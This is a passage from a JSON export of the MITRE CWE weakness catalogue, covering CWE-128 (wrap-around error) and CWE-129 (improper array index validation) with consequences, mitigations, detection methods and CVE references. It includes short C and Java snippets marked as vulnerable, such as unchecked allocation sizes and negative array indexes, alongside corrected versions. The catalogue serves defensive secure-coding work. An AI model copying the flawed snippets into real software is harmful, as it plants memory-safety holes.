crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer under-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"128":{"attr":{"@_ID":"128","@_Name":"Wrap-around Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \\"wraps around\\" to a very small, negative, or undefined value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Due to how addition is performed by computers, if a primitive is incremented past the maximum value possible for its storage space, the system will not recognize this, and therefore increment each bit as if it still had extra space. Because of how negative numbers are represented in binary, primitives interpreted as signed may \\"wrap\\" to very large negative values."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Requirements specification: The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Provide clear upper and lower bounds on the scale of any protocols designed."},{"Phase":"Implementation","Description":"Perform validation on all incremented variables to ensure that they remain within reasonable bounds."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Wrap-around error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"The relationship between overflow and wrap-around needs to be examined more closely, since several entries (including CWE-190) are closely related.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Background_Details"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}]}},"129":{"attr":{"@_ID":"129","@_Name":"Improper Validation of Array Index","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"823","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"789","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function\'s return value, or the resulting value of a calculation directly as an index in to a buffer."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"out-of-bounds array index"},{"Term":"index-out-of-range"},{"Term":"array index underflow"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":"DoS: Crash, Exit, or Restart","Note":"Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the memory corrupted is data, rather than instructions, the system will continue to function with improper values."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., \\"buffer overflows\\" are not always the result. This may result in the exposure or modification of sensitive data."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled."},{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Black Box","Description":"Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed."]}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values."]}},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the code snippet below, an untrusted integer value is used to reference an object in an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String getValue(int index) {}","xhtml:div":{"#text":"return array[index];","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised."},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 &gt; untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num &gt; 0 &amp;&amp; num &lt;= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index &gt;= 0) &amp;&amp; (index &lt; MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"},{"Reference":"CVE-2003-0721","Description":"Integer signedness error leads to negative array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0721"},{"Reference":"CVE-2004-1189","Description":"product does not properly track a count and a maximum number, which can lead to resultant array index overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1189"},{"Reference":"CVE-2007-5756","Description":"Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unchecked array indexing"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"INDEX - Array index overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-129"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"100"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Array Indexing Errors&#34; Page 144"}},{"attr":{"@_External_Reference_ID":"REF-96"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-129"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript.","attr":{"@_Type":"Relationship"}},{"#text":"An improperly validated array index might lead directly to the always-incorrect behavior of \\"access of array using out-of-bounds index.\\"","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, 